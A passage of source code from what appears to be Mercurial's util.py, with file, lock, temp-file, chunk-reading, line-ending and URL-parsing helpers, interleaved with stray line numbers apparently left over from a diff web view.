    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    """
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    # both separators are accepted; empty components are skipped
    for component in path.replace(b'\\', b'/').split(b'/'):
        if not component:
            continue
        for char in _filenamebytestr(component):
            if char in _winreservedchars:
                reserved = _(
                    b"filename contains '%s', which is reserved "
                    b"on Windows"
                )
                return reserved % char
            if ord(char) <= 31:
                invalid = _(
                    b"filename contains '%s', which is invalid on Windows"
                )
                return invalid % stringutil.escapestr(char)
        # only the part before the first dot is compared to device names
        base = component.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            reserved = _(
                b"filename contains '%s', which is reserved on Windows"
            )
            return reserved % base
        last = component[-1:]
        # a trailing dot or space is rejected, except for '.' and '..'
        if last in b'. ' and component not in b'..':
            trailing = _(
                b"filename ends with '%s', which is not allowed "
                b"on Windows"
            )
            return trailing % last
2091
2093
2092
2094
# prefer time.perf_counter when this Python provides it
timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        timer = time.clock
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time
2104
2106
2105
2107
def makelock(info, pathname):
    """Create a lock file atomically if possible

    The lock is first attempted as a symlink at ``pathname`` pointing to
    ``info``. If that fails with an OSError other than EEXIST, or
    os.symlink is missing, a regular file is created exclusively and
    ``info`` is written into it.

    An OSError with errno EEXIST from the symlink attempt is re-raised;
    errors from creating or writing the fallback file propagate as well.

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError:  # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    try:
        os.write(ld, info)
    finally:
        # close the descriptor even if the write fails
        os.close(ld)
2124
2126
2125
2127
def readlock(pathname):
    # type: (bytes) -> bytes
    """Return the info stored in the lock at ``pathname``.

    The lock is read as a symlink target first. If that fails with EINVAL
    or ENOSYS, or symlinks are unavailable, the content of the file at
    ``pathname`` is returned instead. Other OSErrors are re-raised.
    """
    try:
        return readlink(pathname)
    except AttributeError:  # no symlink in os
        pass
    except OSError as inst:
        if inst.errno != errno.EINVAL and inst.errno != errno.ENOSYS:
            raise
    with posixfile(pathname, b'rb') as lockfile:
        return lockfile.read()
2137
2139
2138
2140
def fstat(fp):
    """Stat a file object, even one that has no ``fileno`` method.

    When the fileno-based stat raises AttributeError, the stat of the path
    in ``fp.name`` is returned instead.
    """
    try:
        result = os.fstat(fp.fileno())
    except AttributeError:
        result = os.stat(fp.name)
    return result
2145
2147
2146
2148
2147 # File system features
2149 # File system features
2148
2150
2149
2151
def fscasesensitive(path):
    # type: (bytes) -> bool
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    origstat = os.lstat(path)
    parent, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
        if folded == base:
            return True  # no evidence against case sensitivity
    try:
        foldedstat = os.lstat(os.path.join(parent, folded))
    except OSError:
        # the case-folded name does not resolve
        return True
    # an identical stat means both spellings name the same file
    return not foldedstat == origstat
2173
2175
2174
2176
# _re2 is False when re2 is unavailable, and None while the module is
# imported but not yet checked to work
try:
    import re2  # pytype: disable=import-error
except ImportError:
    _re2 = False
else:
    _re2 = None
2181
2183
2182
2184
class _re(object):
    """Regular expression front end that uses re2 when it is usable."""

    def _checkre2(self):
        """Probe the imported re2 module and store the result in _re2."""
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        """Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE."""
        if _re2 is None:
            self._checkre2()
        re2flags = remod.IGNORECASE | remod.MULTILINE
        if _re2 and not flags & ~re2flags:
            # the flags are passed to re2 as inline prefixes on the pattern
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # fall back to the re module below
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        """Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        """
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape
2225
2227
2226
2228
# module-level instance, so callers can use util.re.compile / util.re.escape
re = _re()

# cache used by fspath(): directory -> {normcased name: name on disk}
_fspathcache = {}
2230
2232
2231
2233
def fspath(name, root):
    # type: (bytes, bytes) -> bytes
    """Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.

    Directory listings are cached in _fspathcache. A component that cannot
    be found, even after re-listing its directory once, is kept as given.
    """

    def _makefspathcacheentry(dir):
        return {normcase(n): n for n in os.listdir(dir)}

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # bytes.replace() returns a new object, so the result has to be rebound;
    # otherwise a backslash separator is not matched by the classes below.
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # runs of separators are copied through untouched
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return b''.join(result)
2275
2277
2276
2278
def checknlink(testfile):
    # type: (bytes) -> bool
    """check whether hardlink count reporting works properly

    Two temporary files are created next to ``testfile``, hardlinked to each
    other, and removed again. Returns False if any step raises OSError.
    """

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    first = second = handle = None
    try:
        fd, first = pycompat.mkstemp(
            prefix=b'.%s-' % os.path.basename(testfile),
            suffix=b'1~',
            dir=os.path.dirname(testfile),
        )
        os.close(fd)
        # same name as the first file, with the '1~' suffix swapped for '2~'
        second = b'%s2~' % first[:-2]

        oslink(first, second)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        handle = posixfile(second)
        return nlinks(second) > 1
    except OSError:
        return False
    finally:
        if handle is not None:
            handle.close()
        for leftover in (first, second):
            if leftover is None:
                continue
            try:
                os.unlink(leftover)
            except OSError:
                pass
2309
2311
2310
2312
def endswithsep(path):
    # type: (bytes) -> bool
    """Check path ends with os.sep or os.altsep."""
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    # bool() keeps the return type a plain bool (helps pytype)
    return bool(altsep and path.endswith(altsep))
2319
2321
2320
2322
def splitpath(path):
    # type: (bytes) -> List[bytes]
    """Split path by os.sep.

    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need."""
    separator = pycompat.ossep
    return path.split(separator)
2329
2331
2330
2332
def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    If name does not exist, the temporary file is left empty. If copying
    fails for any other reason, the temporary file is removed and the
    error is re-raised.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want.  If the original file already exists, just copy
    # its mode.  Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, b"rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        # close both files even when the copy fails, so no handle leaks
        # and the temporary file is no longer open when it is removed below
        with ifp:
            with posixfile(temp, b"wb") as ofp:
                for chunk in filechunkiter(ifp):
                    ofp.write(chunk)
    except:  # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2372
2374
2373
2375
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """

    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build an instance from 'os.stat(path)'

        A missing file (ENOENT) yields an instance whose 'stat' is None;
        any other OSError is re-raised.
        """
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build an instance from 'os.fstat()' of an open file object"""
        return cls(os.fstat(fp.fileno()))

    # __eq__ is overridden below; keep identity-based hashing explicitly
    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (
                self.stat.st_size == old.stat.st_size
                and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
                and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
            )
        except AttributeError:
            # at least one side has no stat result (or 'old' is not a
            # filestat at all); fall through to the "both missing" check
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
        except (AttributeError, TypeError):
            # AttributeError: 'old' has no 'stat' attribute.
            # TypeError: one of the stat results is None (missing file),
            # and None can't be subscripted.
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # masked so the advanced timestamp stays within 31 bits
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2478
2480
2479
2481
class atomictempfile(object):
    """writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    """

    def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
        self.__name = name  # permanent name
        self._tempname = mktempcopy(
            name,
            emptyok=(b'w' in mode),
            createmode=createmode,
            enforcewritable=(b'w' in mode),
        )

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Close the temporary file and rename it over the permanent name

        Does nothing if the underlying file is already closed. With
        checkambig set and an existing target, the mtime of the renamed
        file is advanced when its stat is ambiguous against the old one.
        """
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # False when checkambig is off; otherwise stat of the target
            # as it was before being replaced
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Drop the temporary file without touching the permanent name"""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                # best effort: a failed unlink must not prevent the close
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'):  # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, throw the writes away on exception
        if exctype is not None:
            self.discard()
        else:
            self.close()
2548
2550
2549
2551
def unlinkpath(f, ignoremissing=False, rmdir=True):
    # type: (bytes, bool, bool) -> None
    """unlink and remove the directory if it is empty

    With ``ignoremissing`` the removal goes through tryunlink() instead
    of unlink(). With ``rmdir`` unset the containing directory is left
    alone.
    """
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass
2563
2565
2564
2566
def tryunlink(f):
    # type: (bytes) -> None
    """Attempt to remove a file, ignoring ENOENT errors.

    Any other OSError is re-raised.
    """
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise
2573
2575
2574
2576
def makedirs(name, mode=None, notindexed=False):
    # type: (bytes, Optional[int], bool) -> None
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.

    An already existing ``name`` is not an error, and ``mode`` is not
    applied to it. ``mode``, when given, is applied with os.chmod() to
    every directory this call creates.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # ENOENT: the parent is missing; create it first, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # no further parent to create
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2603
2605
2604
2606
def readfile(path):
    # type: (bytes) -> bytes
    """Return the whole content of the file at ``path`` (binary mode)"""
    with open(path, b'rb') as fp:
        return fp.read()
2609
2611
2610
2612
def writefile(path, text):
    # type: (bytes, bytes) -> None
    """Write ``text`` to the file at ``path``, opened in b'wb' mode"""
    with open(path, b'wb') as fp:
        fp.write(text)
2615
2617
2616
2618
def appendfile(path, text):
    # type: (bytes, bytes) -> None
    """Append ``text`` to the file at ``path``, opened in b'ab' mode"""
    with open(path, b'ab') as fp:
        fp.write(text)
2621
2623
2622
2624
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""

        def splitbig(chunks):
            # chunks above 1 MiB are re-sliced into 256 KiB pieces
            for chunk in chunks:
                if len(chunk) > 2 ** 20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk

        self.iter = splitbig(in_iter)
        # chunks pulled from self.iter but not yet fully handed out
        self._queue = collections.deque()
        # number of bytes of self._queue[0] that were already returned
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            # An earlier sized read may have left chunks in the queue
            # (the first one possibly half-consumed). Return those before
            # the rest of the iterator instead of dropping them.
            pending = list(self._queue)
            if pending and self._chunkoffset:
                pending[0] = pending[0][self._chunkoffset :]
            self._queue.clear()
            self._chunkoffset = 0
            pending.extend(self.iter)
            return b''.join(pending)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2 ** 18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset : offset + left])
                self._chunkoffset += left
                # drives 'left' below zero, which ends the loop
                left -= chunkremaining

        return b''.join(buf)
2704
2706
2705
2707
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data).  Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        # a zero byte request (size 0 or limit used up) skips the read
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2726
2728
2727
2729
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """

    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        """Read up to ``n`` bytes, never exceeding the remaining allowance.

        A negative ``n`` or ``None`` means "everything that is still
        allowed". Returns b'' once the allowance is used up.
        """
        if not self._left:
            return b''

        if n is None or n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        """Fill the writable buffer ``b`` and return the number of bytes
        stored, or None if the underlying read returned None."""
        res = self.read(len(b))
        if res is None:
            return None

        b[0 : len(res)] = res
        return len(res)
2765
2767
2766
2768
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    Each entry of ``unittable`` is a ``(multiplier, divisor, format)``
    tuple. The returned function uses the first entry for which
    ``abs(count) >= divisor * multiplier`` and renders
    ``format % (count / divisor)``. If no entry matches, the format of
    the last entry is applied to ``count`` itself.
    '''

    def go(count):
        for multiplier, divisor, fmt in unittable:
            if abs(count) >= divisor * multiplier:
                return fmt % (count / float(divisor))
        return unittable[-1][2] % count

    return go
2777
2779
2778
2780
def processlinerange(fromline, toline):
    # type: (int, int) -> Tuple[int, int]
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_(b"line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_(b"fromline must be strictly positive"))
    # only the start is shifted: (fromline - 1, toline)
    return fromline - 1, toline
2800
2802
2801
2803
# Render a byte count in GB/MB/KB/bytes. Each unit has three entries so
# that fewer decimals are shown as the value grows: two decimals from 1
# unit, one from 10 units, none from 100 units.
bytecount = unitcountfn(
    (100, 1 << 30, _(b'%.0f GB')),
    (10, 1 << 30, _(b'%.1f GB')),
    (1, 1 << 30, _(b'%.2f GB')),
    (100, 1 << 20, _(b'%.0f MB')),
    (10, 1 << 20, _(b'%.1f MB')),
    (1, 1 << 20, _(b'%.2f MB')),
    (100, 1 << 10, _(b'%.0f KB')),
    (10, 1 << 10, _(b'%.1f KB')),
    (1, 1 << 10, _(b'%.2f KB')),
    (1, 1, _(b'%.0f bytes')),
)
2814
2816
2815
2817
class transformingwriter(object):
    """Writable file wrapper to transform data by function

    ``encode`` is called on every piece of data passed to write() and
    its result is what gets written to ``fp``. close() and flush() are
    forwarded to ``fp`` unchanged.
    """

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        # the return value is that of the underlying write()
        return self._fp.write(self._encode(data))
2831
2833
2832
2834
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2835 # Matches a single EOL which can either be a CRLF where repeated CR
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2836 # are removed or a LF. We do not care about old Macintosh files, so a
2835 # stray CR is an error.
2837 # stray CR is an error.
2836 _eolre = remod.compile(br'\r*\n')
2838 _eolre = remod.compile(br'\r*\n')
2837
2839
2838
2840
def tolf(s):
    # type: (bytes) -> bytes
    """Replace every EOL matched by _eolre in ``s`` with a single LF"""
    return _eolre.sub(b'\n', s)
2842
2844
2843
2845
def tocrlf(s):
    # type: (bytes) -> bytes
    """Replace every EOL matched by _eolre in ``s`` with a single CRLF"""
    return _eolre.sub(b'\r\n', s)
2847
2849
2848
2850
def _crlfwriter(fp):
    """Wrap ``fp`` so that written data goes through tocrlf() first"""
    return transformingwriter(fp, tocrlf)
2851
2853
2852
2854
# Select the EOL helpers once at import time: real conversions when the
# platform line separator is CRLF, pass-through functions otherwise.
if pycompat.oslinesep == b'\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2861
2863
if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
    3,
    0,
):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" work fine, as we do not support Python < 2.7.4.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.

    def iterfile(fp):
        """Return an iterable over the lines of ``fp``

        Only a builtin ``file`` that is not a regular file takes the
        slower readline() based path; everything else is returned as is.
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            # fp.readline deals with EINTR correctly, use it as a workaround.
            return iter(fp.readline, b'')


else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return ``fp`` itself; it is iterated directly"""
        return fp
2906
2908
2907
2909
def iterlines(iterator):
    # type: (Iterator[bytes]) -> Iterator[bytes]
    """Yield the lines of every chunk produced by ``iterator``

    Each chunk is split on its own with splitlines(), so line endings
    are dropped and a line spanning two chunks comes out as two pieces.
    """
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line
2913
2915
2914
2916
def expandpath(path):
    # type: (bytes) -> bytes
    """Expand environment variables, then a leading ``~``, in ``path``"""
    return os.path.expanduser(os.path.expandvars(path))
2918
2920
2919
2921
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    The keys of mapping are inserted into the regular expression as is,
    and mapping itself is never modified.
    """
    fn = fn or (lambda s: s)
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            # drop the regular expression backslash
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # the doubled prefix maps to a literal prefix character; add that
        # entry to a private copy so the caller's mapping stays untouched
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    # x.group() is the whole match; [1:] strips the one-character prefix
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944
2946
2945
2947
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Resolve ``port`` to a numeric port.

    A value that ``int()`` can convert is converted and returned directly.
    Otherwise it is treated as a network service name and looked up with
    socket.getservbyname(); when no such service exists, error.Abort is
    raised.
    """
    try:
        number = int(port)
    except ValueError:
        # not numeric: fall through to the service-name lookup
        pass
    else:
        return number

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )
2965
2967
2966
2968
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
